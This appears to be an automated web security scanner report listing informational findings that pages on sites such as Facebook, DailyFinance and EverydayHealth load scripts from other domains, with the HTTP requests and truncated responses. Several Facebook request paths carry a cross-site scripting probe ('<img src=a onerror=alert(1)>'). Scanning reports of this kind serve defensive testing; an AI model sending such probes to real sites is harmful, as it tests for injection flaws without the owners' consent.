Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
Content-Length: 63392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="stars">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v42.5/js/override.60241.main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.3. http://www.bankrate.com/funnel/mortgages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bankrate.com
Path:	/funnel/mortgages/

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.4. http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blogsmithmedia.com
Path:	/www.dailyfinance.com/media/dailyfinance.css

Issue detail

The response dynamically includes the following script from another domain:

http://o.aolcdn.com/ads/adsWrapper.js

Request

GET /www.dailyfinance.com/media/dailyfinance.css HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 114472
Content-Type: text/css
Cache-Control: max-age=238
Expires: Thu, 05 May 2011 01:02:12 GMT
Date: Thu, 05 May 2011 00:58:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 114472

/*Gallery Start*/
/* CAPTIONED THUMB --------------- */
.gallery .all-galleries {
padding: 8px 0;
width: 470px;
margin: 0;
}
#content .gallery h2 {
margin: 0;
}
#content .gallery .all-galler
...[SNIP]...
</title>
5 <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...

17.5. http://www.citysbest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4
http://www.blogsmithmedia.com/www.citysbest.com/include/background.js?9
http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30

Request

Response

17.6. http://www.crunchboard.com/opening/detailjob.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crunchboard.com
Path:	/opening/detailjob.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dabagirls.com
Path:	/\|http:/www.stylemepretty.com/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:

http://stats.wordpress.com/e-201118.js

Request

GET /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dabagirls.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 10:56:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">

<head
...[SNIP]...
</div><script src="http://stats.wordpress.com/e-201118.js" type="text/javascript"></script>
...[SNIP]...

17.8. http://www.dailyfinance.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.adsonar.com/js/tw_dfp_adsonar.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/js/swfobject-1.5.1/swfobject.js
http://o.aolcdn.com/os/df/js/copyRight.js
http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.5.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.min.js&os=4
http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://o.aolcdn.com/os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js
http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198

Request

Response

17.9. http://www.dailyfinance.com/markets/mostactives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/markets/mostactives

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsEnd.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/aim/web-aim/aimapi.js
http://o.aolcdn.com/art/merge/?f=/df_js/jquery.globalheader-1.3.js&f=/df_js/jquery.globalsearchbox-1.3.js&f=/df_js/jslib1.2.js&f=/df_js/df-search0.6.js&f=/df_js/smartbox1.7.4.js&expsec=2600000
http://o.aolcdn.com/dailyfinance/tools/static_c/__0322121228/js/??webaim.js,relegenceapi.js,relegence.js,RelegenceAjax.js,RelegenceNews.js,RelegenceTab.js,bootstrap.js,supertabs.js,crossdomain.js,swfobject-2_2.js,MarketsUpdater.js,QuoteUpdater.js,HomeBlock.js,QuoteInfo.js,Headlines.js,HeatUpdater.js
http://o.aolcdn.com/os/money/dailyfinance/js/gh/jquery-1.3.2.min.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Content-Language: en
Content-Length: 90327
Keep-Alive: timeout=5, max=1000
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers: Most
...[SNIP]...
<link rel="stylesheet" href="http://o.aolcdn.com/dailyfinance/tools/static_c/__0322121228/css/??common.css,master.css,supertabs.css" type="text/css" />
<script language="javascript1.1" src="http://o.aolcdn.com/ads/adsWrapper.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://o.aolcdn.com/aim/web-aim/aimapi.js"></script>

<script src="http://o.aolcdn.com/dailyfinance/tools/static_c/__0322121228/js/??webaim.js,relegenceapi.js,relegence.js,RelegenceAjax.js,RelegenceNews.js,RelegenceTab.js,bootstrap.js,supertabs.js,crossdomain.js,swfobject-2_2.js,MarketsUpdater.js,QuoteUpdater.js,HomeBlock.js,QuoteInfo.js,Headlines.js,HeatUpdater.js" type="text/javascript"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="http://o.aolcdn.com/os/money/dailyfinance/js/gh/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/df_js/jquery.globalheader-1.3.js&f=/df_js/jquery.globalsearchbox-1.3.js&f=/df_js/jslib1.2.js&f=/df_js/df-search0.6.js&f=/df_js/smartbox1.7.4.js&expsec=2600000"></script>
...[SNIP]...
</div>

<script language="Javascript1.1" SRC="http://o.aolcdn.com/ads/adsEnd.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.fmpub.net/zone/2555
http://static.fmpub.net/zone/936

Request

Response

17.11. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.12. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

Response

17.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

Response

17.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/js/socialize.js?apiKey=2_8EfdkImERrOXsR0bxPbzwQ5_9X4rmkUc8lqP8duGovaXunCtSz4As4J5Q4Su2fUg
http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://tracking.waterfrontmedia.com/GCScript.ashx?p=37

Request

Response

17.15. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.16. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.17. http://www.facebook.com/10000082482078341583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.18. http://www.facebook.com/10000082482078341583ab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.19. http://www.facebook.com/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.20. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.21. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.22. http://www.facebook.com/AOLrealestate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/AOLrealestate

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.23. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.24. http://www.facebook.com/DailyFinance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/DailyFinance

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.25. http://www.facebook.com/HockeyKen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HockeyKen

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.26. http://www.facebook.com/KickIceForever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/KickIceForever

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.27. http://www.facebook.com/LadyBonesie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LadyBonesie

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.28. http://www.facebook.com/Loizza previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Loizza

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.29. http://www.facebook.com/aim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aim

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.30. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.31. http://www.facebook.com/aol previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aol

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.32. http://www.facebook.com/aolradio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aolradio

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.33. http://www.facebook.com/burkerkink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/burkerkink

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.34. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
